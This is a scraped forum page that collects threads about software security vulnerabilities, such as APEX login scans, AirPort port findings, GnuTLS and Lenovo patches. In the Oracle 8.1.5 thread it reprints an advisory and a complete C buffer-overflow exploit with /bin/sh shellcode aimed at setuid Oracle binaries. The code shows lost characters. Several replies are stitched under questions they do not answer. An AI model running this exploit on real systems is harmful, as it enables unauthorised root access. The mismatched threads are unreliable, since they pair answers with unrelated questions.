Possible Security Vulnerability at Root regarding Mozilla & Keychain

Similar Messages

• Possible security vulnerability with apex

  Hello experts,
  I developed an application based on apex 4.2.6.00.03.
  The application uses custom authentication.
  My workplace uses Acunetix Web Vulnerability Scanner. When I scanned my app through Acunetix , the scan report shows my login password in clear text.
  (When we run the scan, we provide login sequence to Acunetix by actually logging in to the application)
  The scan report shows results like this: (I have removed my login credentials here and modified numbers for p_arg_names)
  /apex/wwv_flow.accept
  p_arg_names=357038148338609&p_arg_names=357039161318613&p_flow_id=&p_flow_step_id=10
  1&p_instance=325240555604&p_md5_checksum=&p_page_checksum=2EB94E21D0F04502B99AFFF7
  FAFD&p_page_submission_id=108909717781&p_request=LOGIN&p_t01="my user name"&p_t02="my password in clear text"
  How can I prevent my password to be showing up as clear text? Or even better, remove password completely?
  Password item is of type "Password". I didn't change default attributes of this item.
  Please help! And let me know if you need any further information to debug the issue.
  Thanks,
  RN

  I had a brief look at;
  http://www.acunetix.com/blog/docs/scan-form-based-protected-area-using-acunetix-login-sequence-recorder/
  Assuming that is how you have provided the username and password then this is how the web scanner has obtained the password. This is not 'interception' of the SSL channel. In effect you have typed the username/password into the web scanner application and it is using it to logon to the application (and showing you in its logs). We use a variation of the same technique in our ApexSec security product to log into the APEX builder. So long as the web scanner uses SSL to then forward the credentials then there is minimal additional risk than using a normal browser.
  If your certificates are correct and signed and the SSL server does not support 'weak ciphers' plus a normal browser indicates there is nothing wrong with the secure connection then you are as protected as you can be from interception of an established connection.
  Weak ciphers are detailed here - I presume you have some form of support from Acunetix;
  https://www.acunetix.com/blog/articles/tls-ssl-cipher-hardening/
  SSL by default does not give you "endpoint" security, i.e. any entity that can establish a network connection to the SSL service can create an SSL channel and interact with the service, as I've mentioned this can be implemented via SSL with client side certificates.
  If the assumptions I have made are correct and the details you have provided are correct then it sounds like this is not an issue you need to be concerned about.
  Hope this helps.
  regards,

• We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  We use an add-on in one of our online solutions and we've identified a security vulnerability. The issue has been addressed in our latest add-ons and we would like to know how we may blocklist our previous player through a firefox update?

  You can file a bug report to do that request.
  http://developer.mozilla.org/en/docs/Bug_writing_guidelines

• Security vulnerability in Oracle 8.1.5

  The following email was forwarded to me about possible security vulnerabilities.
  I am looking for verification from both Oracle and the user comunity.
  ================================================================================
  [ Hackerslab bug_paper ] Linux ORACLE 8.1.5 vulnerability
  ================================================================================
  File : Oracle 8.1.5
  SYSTEM : LINUX
  Tested by RedHat Linux 6.2
  INFO :
  There are two security vulnerability in Oracle.
  1. buffer overflow
  It is possible to create a buffer overflow vulnerability using "ORACLE_HOME",
  one of the environmental value of Oracle.
  Oracle applications that are vulnerable to buffer overflow are as follow :
  - names
  - namesctl
  - onrsd
  - osslogin
  - tnslsnr
  - tnsping
  - trcasst
  - trcroute
  Thease applications allow an attacker to excute a buffer overflow exploit.
  2. Log-files created
  When a user excutes one of Oracle applications such as names, oracle or tnslsnr,
  following log files are created.
  names
  ======
  -rw-rw-r-- 1 oracle dba 0 Oct 20 01:45 ckpcch.ora
  -rw-rw-r-- 1 oracle dba 428 Oct 20 01:45 ckpreg.ora
  -rw-rw-r-- 1 oracle dba 950 Oct 20 01:45 names.log
  oracle
  ======
  -rw-rw---- 1 oracle dba 616 Oct 20 05:14 ora_[running pid].trc
  tnslsnr
  =======
  -rw-rw-r-- 1 oracle dba 2182176 Oct 20 2000 listener.log
  SOLUTION
  Contact your vendor for a patch or close setuid permission.
  # su - oracle
  $ cd /oracle_8.1.5_install_directory/bin
  $ chmod a-s names namesctl onrsd osslogin tnslsnr tnsping trcasst trcroute
  ==-------------------------------------------------------------------------------==
  * ** ** * [email protected] [yong-jun, kim]
  * ** ** * [ [URL=http://www.hackerslab.org]http://www.hackerslab.org ]
  ******** HACKERSLAB (C) since 1999
  ==-------------------------------------------------------------------------------==
  Oracle 8.1.5 exploit
  -by loveyou
  offset value : -500 ~ +500
  #include <stdio.h>
  #include <stdlib.h>
  #define BUFFER 800
  #define NOP 0x90
  #define PATH "/hackerslab/loveyou/oracle/8.1.5/bin/names"
  char shellcode[] =
  /* - K2 - */
  /* main: */
  "\xeb\x1d" /* jmp callz */
  /* start: */
  "\x5e" /* popl %esi */
  "\x29\xc0" /* subl %eax, %eax */
  "\x88\x46\x07" /* movb %al, 0x07(%esi) */
  "\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
  "\x89\x76\x08" /* movl %esi, 0x08(%esi) */
  "\xb0\x0b" /* movb $0x0b, %al */
  "\x87\xf3" /* xchgl %esi, %ebx */
  "\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
  "\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
  "\xcd\x80" /* int $0x80 */
  "\x29\xc0" /* subl %eax, %eax */
  "\x40" /* incl %eax */
  "\xcd\x80" /* int $0x80 */
  /* callz: */
  "\xe8\xde\xff\xff\xff" /* call start */
  "/bin/sh";
  unsigned long getesp(void)
  __asm__("movl %esp,%eax");
  int main(int argc, char *argv[])
  char buff, ptr,binary[120];
  long *addr_ptr, addr;
  int bsize=BUFFER;
  int i,offset;
  offset = 0 ;
  if ( argc > 1 ) offset = atoi(argv[1]);
  buff = malloc(bsize);
  addr = getesp() - 5933 - offset;
  ptr = buff;
  addr_ptr = (long *) ptr;
  for (i = 0; i < bsize; i+=4)
  *(addr_ptr++) = addr;
  memset(buff,bsize/2,NOP);
  ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
  for (i = 0; i < strlen(shellcode); i++)
  *(ptr++) = shellcode;
  buff[bsize - 1] = '\0';
  setenv("ORACLE_HOME",buff,1);
  printf("[ offset:%d buffer=%d ret:0x%x ]\n",
  offset,strlen(buff),addr);
  system(PATH);
  null

  Hi Peter,
  I was told that Oracle8 and Oracle8i Parallel Server on IBM
  RS/6000 AIX comes with its own Lock Manager and this LM does not
  rely on the Cluster Lock Manager (cllockd) of HACMP for AIX, as
  Oracle7 Parallel Server on normal (non-SP) RS/6000 does.
  (Oracle7 Parallel Server on RS/6000 SP didn't use the cllockd of
  HACMP but came with a special LM.)
  Cluster-wide Filesystems are not used for OPS on Unix, as far as
  I know Unix (AIX, Solaris). All Data-, Log- and Control-Files
  must reside on concurrently (!) accessible Raw-Devices (e.g. Raw
  Logical Volumes on AIX).
  So I guess it should be possible for Oracle to port OPS to Linux.
  No special Cluster-Services would be needed for OPS on Linux,
  just a shared SCSI-bus (e.g.) and a fast interconnect (e.g.
  100BaseT).
  Peter Sechser (guest) wrote:
  : Dave,
  : Parallel Server needs some cluster services in order to
  : communicate between several nodes. So, the operating system has
  : to offer things like inter-node communication services,
  : cluster-wide lock communication services and a clusterwide
  : filesystem. I'm not quite sure, to what degree Linux
  offers/will
  : offer these services.
  : Peter
  null

• JComboBox makes for nice security vulnerability under X11?

  I noticed a couple years ago that when I set a breakpoint inside a JComboBox state change event handler on a Java application or applet running under X11, the entire desktop would hang. Back then, I checked the Swing bug database and found an issue regarding this, but it was closed with an evaluation that pretty much simply said that the developer didn't know how to fix it.
  When I brought this up in the netbeans mailing list, someone suggested that this could be a security issue if someone intentionally/programmatically stopped all processing from within this event handler (perhaps from an applet). Perhaps, as a security vulnerability this bug would get more attention!
  Well, it's been over a year and the latest JDK 1.6b10 (build 25) still has this problem. So, obviously it's not bothering anyone, except me, enough to do anything about it. I could try to file this bug under Swing again (probably with same outcome) or try filing it as a security bug. What are people's thoughts?

  Hi
  Try going here:
  http://europe.nokia.com/A4423034
  Or alternatively : find the product pages for the 5700 by going to www.nokia.com/phones, then pick out 5700, then dip into "PC software" and "Music"
  Cheers

• Tightening security on the Root DSE

  Good afternoon,
  I would like to tighten the security on my Root DSE to allow a simple 'DirContext.lookup("")' to not throw a seucurity exception for any normal users.
  However, the only ACI setting that seems to allow any user 'read' / 'browse' access to the Root DSE itself is this:
  access to attr=(*) by * (read,search,compare)
  There seems to be a hidden attribute that is accounted for by specifying (*). I tried the obvious, supportedextensions, supportedldapversion, and others.
  Compatibility with Portal is ideal, but thats an afterthought at this time.
  Thanks!!
  -Sean

  Hello Jano,
  ok let me explain the scenario for a better visibility of the problem.
  The files are lying on the webserver underits root directory.
  1.The root directory of the server is docs.
  2.The files(file1.txt,file2.txt) are lying in a directory by the name of cliksdmrroot which inturn is lying on the root directory docs.
  so the file structure becomes /docs/cliksdmrroot.
  Now this(file1.txt,file2.txt) can be accessed by typing http://web_server_ip/docs/cliksdmrroot/file1.txt
  Requirement:-
  To protect the unauthorised access to this file1.txt lying in the cliksdmrroot.
  Approach taken:-
  I have made a servlet by the name of cliksdmrroot and have mapped it to the url prefix cliksdmrroot. this servlet is lying in the cliksdmrroot folder.
  Now whenever a request is made for the file1.txt which is by entering the url
  http://web_server_ip/docs/cliksdmrroot/file1.txt
  then this request will be intercepted first by the servlet.
  This servlet is responsible for any sort of validation that has to be done prior to content serving.
  But now if i want to redirect the request to the resource after the validation is cleared i am using
  httpservletrequest.getRequestDispatcher(trimmedrequestURI).forward(httpservletrequest, httpservletresponse);
  to forward the request. where trimmedrequestURI is the extracted filename from the getRequestURI method.
  if i use this approach the webserver forwards the request to
  http://web_server_ip/docs/cliksdmrroot/file1.txt
  which again has cliksdmrroot in its address which inturn invokes the servlet and it leads to a too many nested despatches exception. How can i overcome this. and also if you have some other solution in mind i would be obliged if you could help me in this.
  Regards,
  Saurabh

• CVE-2000-0649 Security Vulnerability

  I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security scan and a security vulnerability on ports 8008 and ports 8009 has been identified, issue CVE-2000-0649, whereby my internal IP addresses may be exposed.
  Is there a later version of HTTPSTK and PORTAL which address this security vulnerability, or do I need to close ports 8008 and 8009 via my firewall?

  -----BEGIN PGP SIGNED MESSAGE-----
  Hash: SHA1
  Did you read the CVE... the one from eleven years ago? First clue that
  this is, as usual, bogus:
  <quote>
  IIS 4.0 allows remote attackers to obtain the internal IP address of the
  server via an HTTP 1.0 request for a web page which is protected by basic
  authentication and has no realm defined.
  </quote>
  If you're really concerned have your security assessors prove the issue is
  real by exploiting the vulnerability.
  Good luck.
  On 06/27/2011 10:36 AM, flakestar wrote:
  >
  > I have 2 NW 6.5 SP8 servers which are running HTTPSTK (version 4.03
  > 9/4/08) PORTAL (version 4.03 9/22/08). I am trying to pass a security
  > scan and a security vulnerability on ports 8008 and ports 8009 has been
  > identified, issue CVE-2000-0649, whereby my internal IP addresses may be
  > exposed.
  >
  > Is there a later version of HTTPSTK and PORTAL which address this
  > security vulnerability, or do I need to close ports 8008 and 8009 via my
  > firewall?
  >
  >
  -----BEGIN PGP SIGNATURE-----
  Version: GnuPG v2.0.15 (GNU/Linux)
  Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
  iQIcBAEBAgAGBQJOCLtRAAoJEF+XTK08PnB5gJ4QAI1k0a3y1t 6Pua2lK50gU0Xr
  l2AMohzLEDRgyia2z16magQNy7mhfIlBdvC5gI30WV4GmGI2Yv Ydco0W8uEUoenY
  qXPhZLCT7pfbs1pIpv+nlNfV69UlobcM5FiAuw4lu815WNBO37 77i53K1Gh6PN7A
  vIv9JImirxM1WQVYYsibpiO+dxUyjr3CJ6ND5TlGcojVhx7Uti tipmrAspHBw+vd
  QUlg9QUt7i2lk6JHt2M3YArcD0LI8UzFhwmsqxLZ+4a/BJzkY1Q13Thb/cLx1cM7
  d1KWlF4h81K+hTCBP78Q+fWQrcVgNq10ix0hhaKat0oRpKoXfV 9nJjyZgMJ6V/vi
  HHeptlfonOUAef5KxEZJoac7FCQRgTsgOhM1Sj+sXtAQ6gAH8Q I+0j5iw4iBBwRs
  +Ycc5SdoFAVe1aXjz7CfZjaOgk/I2S3OgCSceJEf5X5eBhzl4C0g9xDzhALo5MFp
  iDMhAPJ19bMVT374mhC1J9QsOvM/o07a9vth6zgy3g5aQrL/SO4Rmyy6w1LiKeBX
  hoM8pEZSvU4AFWh4okDRZdplEcKjEzowyTwwRcC8gIQHE4kxir Iso5v62vTSTxM4
  0JbqRfQvuGZQN8dh7W2HiF5Bi+d9Q3bJ0zhhG1GLGu/iIAsXGYMRvsQAx4tPIGcJ
  puQi/2ySMcsNfb0bOL9L
  =pz/w
  -----END PGP SIGNATURE-----

• HT202802 What "security vulnerability" will be opened by using this signing technique?

  Regarding article: HT202802
  OS X: Using AppleScript with Accessibility and Security features in Mavericks - Apple Support
  The article says:
  Important: Signing an applet using the following method introduces a security vulnerability that could allow malicious software to use Accessibility without user permission.
  1. What "security vulnerability" will be opened by using this signing technique?
  2. Does signing this way only make the App its applied to vulnerable only? and then the whole computer vulnerable depending on how extensive the app's reach is to the rest of the computer?
  3. More information: My app only relates to the Reminders app and bunch of Finder items....nothing internet based, etc.  That being said, is this still a vulnerability to my computer?
  "Note: If you have your own signing identity, you may use that identity in place of “-” for the -s option." 
  1. What is "my own signing identity?" and if I don't have one, would it add security to get one and use it here?
  Thanks for the help in advance!

  1) There are a few system features, including accessibility, that will override any and all other security protections on you machine. This is the vulnerability. In giving the script the ability to control your machine, you give control of your machine to the script.
  2) By signing the script, that control is permanent. If the app doesn't do anything malicious, there is no problem. But malicious apps sometimes don't manifest until later.
  3) Did you write the app? If so, then there is nothing to worry about. If not, then how much do you trust the author of the app?
  Generally, this isn't too big a deal. Apple is very protective, but most people generally hand over their passwords to anyone. They shouldn't, of course, but generally they do. They don't realize the extent to which they have handed over control of their machine and all of their data. Apple is trying to point that out.

• FTP security vulnerability or what ?

  I have tested the FTP settings on my DL2100 and allowed access for only 2 users X and Y. I have disabled Anonymous user on the FTP folder.When i looked at my logs, i saw that Anonymous has been logging in and out a few times a day.  I said that impossbile since this user is  not allowed.I logged on to the FTP with Anonymous myself, to my surprise and see only the ROOT folder, but indeed no FTP shares. I couldn't navigate anywhere with this user, BUT is this the way WD intended to secure FTP connections ? Shouldn't  the connection for Anonymous be denied from the beggining ?

  adicrst wrote:
  Reply from WD Support Thank you for contacting Western Digital Customer Service and Support. My name is X.
  I am sorry to read that you have an issue with the FTP. Our apologies for the inconvenience that this may have caused you.
  Concerning the question you have about the Anonymous in FTP, I can inform you that when you created shares w which are accessible through FTP and you selected for the Anonymous as None, it is counted always for the share which Anonymous is not allowed to access and not for the root directory. That is why you can see the root directory, but not the specific shares.
  I hope that I provided you the information you need and that you are satisfied with the answer.
  If you have any further questions, please reply to this email and we will be happy to assist you further. So in other words we should just live with this security vulnerability, even if everyone has a solid confirmation that your FTP is available on the internet and everyone can log just for the fun of it with Anonymous user.What if i allow only 1 FTP connection and a hacker is holding it busy with  Anonymous session ? Like the support guy state, when you enable FTP on a folder, remember to select, when I state select mean click the down arrow and select "Anonymous None" then click save.  That is how I know it will save the setting.  If you don't select, the device will think you want to set your FTP server for everyone to log in "including annonymous."

• Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?

  Is there an Iphone 3G Software Update Fixes security vulnerability associated with viewing malicious PDF files?  Latest version I can download is 4.2.1
  I assume no fix is available, does anyone know if I'm still vulnerable to the security bug?

  No fix is needed since that vulnarability isn't in 4.2.1.

• Possible Security Risks

  I got my AirportExtreme base station connected to ISP via fibre-optic modem via PPPoE assessed by Comodo.com, and it gave these possible security threats. It was even possible to tell how long had the airport connected to Internet via PPPoE, which was bit of scary.
  I do not know how to make it stop responding to ICMP pings coming from outside, which is also a considerable potential security threat.
  I do not know how to fix them. Does anyone know? (I paste some excerpts from the security report for reference.)
  *1. Security warning found on port/service "osu-nms (192/udp)"
  The remote host is an Airport, Airport Extreme or Airport Express wireless access point. It is possible to gather information about the remote base station (such as its connection type or connection time) by sending packets to UDP port 192. An attacker connected to this network may also use this protocol to force the base station to disconnect from the network if it is using PPPoE, thus causing a denial of service for the other users.
  Solution : Filter incoming traffic to this port, make sure only authorized hosts can connect to the wireless network this base station listens on.
  Risk factor : Medium / CVSS Base Score : 4 (AV:R/AC:H/Au:NR/C:N/A:C/I:N/B:A) Plugin output: - The station has been connected to the network for 10 days 12h47m28s - The station is connected to the network via PPTP.
  *2 Security warning found on port/service "general/icmp"
  Synopsis : It is possible to determine the exact time set on the remote host. Description : The remote
  host answers to an ICMP timestamp request. This allows an attacker to know the date which is set on
  your machine. This may help him to defeat all your time based authentication protocols.
  Solution : filter out the ICMP timestamp requests (13), and the outgoing ICMP timestamp replies (14).
  Risk factor : None / CVSS Base Score : 0 (AV:R/AC:L/Au:NR/C:N/A:N/I:N/B:N)
  CVE : CVE-1999-0524
  iBook G4   Mac OS X (10.4.6)   Using AirportExtreme Base Station (Firmware ver. 5.7)

  I got my AirportExtreme base station connected to ISP
  via fibre-optic modem via PPPoE assessed by
  Comodo.com, and it gave these possible security
  threats. It was even possible to tell how long had
  the airport connected to Internet via PPPoE, which
  was bit of scary.
  I do not know how to make it stop responding to ICMP
  pings coming from outside, which is also a
  considerable potential security threat.
  Actually you can't. You can't manage the firewall
  filtering within an ABS, an AEBS or an AX. They
  look like they share the exact same code for this
  part of their software.
  I do not know how to fix them. Does anyone know? (I
  paste some excerpts from the security report for
  reference.)
  You have 2 architectural ways to improve the protection
  of your network (on the Internet side):
  - introduce a firewall between your modem and your AEBS;
  - use a Mac as a firewall router:
  * connect this Mac via Ethernet to your modem;
  * configure its firewall (and enable logging);
  * configure the sharing of this Ethernet connection
  to AirPort.
  *1. Security warning found on port/service "osu-nms
  (192/udp)"
  *2 Security warning found on port/service
  "general/icmp"
  These aren't really serious risks. But you should report
  them to Apple. Why for?
  Because there are really serious risks around the use
  of the AirPort base stations (all of them) and some of
  them are already reported to Apple.
  Apple should be aware that many of their customers are
  tired of networks, Internet, softwares and OSes they
  can't trust.
  dan    

• Mac Java security vulnerability upgrade - issue.

  The recent (I did it today) upgrade of Mac OS 10.8.2 to fix Java security vulnerability is now causing flickering on my Macbook Pro. Kindly help.

  Restart.
  Reset PRAM.  http://support.apple.com/kb/PH4405
  Best.

• Upgrade to GnuTLS 3.2.12 to Avoid Security Vulnerability

  Per ArsTechnica, RedHat discovered a security vulnerability in GnuTLS and published an alert on March 3. Thanks to andyrtr, the safe version (3.2.12-1) was pushed into extra on March 3 (i.e., same day).
  You might consider updating GnuTLS.
  Further details
  http://arstechnica.com/security/2014/03 … sdropping/
  Last edited by snakeroot (2014-03-04 23:53:21)

  nourathar wrote:
  nomorewindows wrote:pacman -Qi gnutls would give this for installed applications that use it.
  Hi nomorewindows,
  $ pacman -Qi gnutls
  Name : gnutls
  Version : 3.2.12-1
  Description : A library which provides a secure layer over a reliable transport layer
  Architecture : x86_64
  URL : http://www.gnutls.org/
  Licenses : GPL3 LGPL2.1
  Groups : None
  Provides : None
  Depends On : gcc-libs libtasn1 readline zlib nettle p11-kit
  Optional Deps : None
  Required By : ffmpeg filezilla glib-networking gnome-vfs gst-plugins-bad libimobiledevice smbclient
  Optional For : None
  Conflicts With : None
  Replaces : None
  Installed Size : 4703.00 KiB
  Packager : Andreas Radke <[email protected]>
  Build Date : Mon 03 Mar 2014 04:09:47 PM CET
  Install Date : Tue 04 Mar 2014 11:24:30 PM CET
  Install Reason : Installed as a dependency for another package
  Install Script : Yes
  Validated By : Signature
  the output is very different though and in my case  it lists only 7 packages.
  It makes me really wonder what 'whoneeds' actually does ?
  I suppose 'whoneeds' lists all the packages I have installed that require one of these 7 and so recursively on ?
  ciao,
  J.
  Notice it said 49 of his 495 packages.  And also notice that the same ones listed in your output are also in his output above.

• WRT1900AC - Open Port - 52147 - Security Vulnerability?

  I recently noticed in the router logs incoming connections on port 52147. I have confirmed that this port on the router is open (not closed or stealthed), by using the port scan tool at www.grc.com.  See port scan screenshot below.
  This situation is present with no devices connected to my internal network. My router is on the current firmware (1.1.8.164461).
  Anyone have an idea what is going on?
  Jeff
  Incoming log
  Source IP address | Destination port number
  110.93.76.194          52147 
  73.52.28.251            52147

  Yes, I did setup a Smart Wifi account during initial setup.
  It there any documentation where I can confirm that the port is open for Smart Wifi services, and should I be concerned about the inbound connections listed in the log (See above)?
  I am seeing a few more random IP addresses associated with that port in the log each day or so, and I would think that if it was due to legitimate Smart Wifi services activity, the traffic would be from a specific (and documented) address for Linksys servers.
  UPDATE: I just checked the log again, and there are a dozen or so random IP addesses in the Incoming Log associated with port 52147. Who-Is lookups place these addresses all around the world. Until this is explained to my satisfaction, I am leaving my devices disconnected from this router, and treating this as a security vulnerability.
  If anyone has any information or insight into this, it would be greatly appreciated.

• Lenovo software and driver security vulnerability fixes

  I have noticed there are security vulnerability fixes (among other fixes) in several Lenovo software and driver updates.
  Synaptics ThinkPad UltraNav Driver (2013/04/25, version 16.2.19.7)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/6hgx75ww.txt
  <16.2.19.7>
  - (Fix) Fixed security vulnerability issues.
  Hotkey Features Integration (2013/04/25, version 3.84.5000)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/8jvu35ww.txt
  <3.84.5000>
   - (Fix) Fixed security vulnerability issues in service registration path and function calls inside the program binary.
  Power Manager (2013/04/26, version 6.54)
  http://download.lenovo.com/ibmdl/pub/pc/pccbbs/mobiles/hfu406ww.txt
  <6.46>
  - (Fix) Fixed a vulnerability security issue.
  ThinkVantage Access Connections (2013/04/08, vesion 6.01)
  http://download.lenovo.com/pccbbs/mobiles/ggc709ww.txt
  <5.97>
   - (Fix) Fix for security vulnerabilities privately and responsibly disclosed by Frederic BOURLA of High-Tech Bridge SA

  There are several reports of fixed vulnerabilities in Lenovo software and drivers that I have summarized here
  Unfortunately there are no detailed descriptions of these security issues. Currently there are databases like CVE MITRE that collects such reports for any software. Could Lenovo be more specific about these vulnerabilities and add CVE references ?
  Moderator Note; Threads merged; link to this thread removed